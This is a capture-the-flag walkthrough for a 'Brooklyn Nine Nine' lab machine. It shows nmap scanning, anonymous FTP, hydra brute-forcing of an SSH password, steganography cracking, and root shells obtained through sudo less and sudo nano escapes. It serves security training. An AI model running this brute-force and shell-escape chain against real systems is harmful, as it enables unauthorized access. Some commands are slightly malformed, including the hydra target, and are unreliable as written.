Brooklyn Nine Nine

Reconnaissance
Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)
nmap -Pn 10.10.146.230

Detailed Nmap Scan :
Command Breakdown:
(-sV): Service version
(-sC): Default nmap scripts
(-p): Specifying ports 21,22,80
(-oN nmap): Saving it into a files called nmap
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.146.230

Enumeration
Port 21: FTP
Looks like we can login through ftp as anonymous, lets do that. (We use anonymous for both username and password or you can just hit enter for password)
ftp 10.10.146.230

Lets list the file in this directory

Looks like there is a file which is a note to a person called Jake
, lets transfer this file to our machine and read what it has to say.
get note_to_jake.txt

Lets now read the file

Looks like Jake did not change his password as mentioned by a person called Amy
. We also have a username Holt
, we now have three usernames
Port 80: HTTP
Lets visit the website

Its a Brooklyn Nine Nine poster, lets look at the source code.

We have something interesting, they mention steganography, which is the practice of concealing a message within message. So lets download the image onto our machine, the name of the image is in the source code
wget http://10.10.146.230/brooklyn99.jpg

Exploitation
FTP
We can try to use hydra to find the password for Jake
.
hydra -l jake -P /usr/share/wordlists/rockyou.txt http://10.10.146.230 ssh

We found the password, so lets login through ssh.

And we are logged in. We can find the user flag here.

HTTP
We can use a tool called stegcracker to find hidden messages within files. If you do not have it you can download it with this command
apt get install stegcracker

Now you can use stegcracker
stegcracker brooklyn99.jpg

We have the password, this can be the password for the file. Lets see what the file is hiding
steghide --extract -sf brooklyn99.jpg

Now we have the password for Holt, lets login through ssh.

Privilege Escalation
Jake
Lets run sudo -l
to see what Jake can run as root.
sudo -l

Looks like we can run the less command, with which we can see contents of files, so lets run the command to check what /root/root.txt
contains.
sudo /usr/bin/less /root/root.txt

We can also try to become root using the commands found in GTFOBins

Lets use these commands to become root.
sudo less /etc/profile
!/bin/sh

Holt
Lets run sudo -l
to see what Holt can run as root.
sudo -l

We can nano as root, so lets go to GTFOBins to find the commands to escalate privilege's to root.

Lets run these commands
sudo nano
^R^X
reset; sh 1>&0 2>&0

We are now root. You can find the root flag in /root/
Last updated
Was this helpful?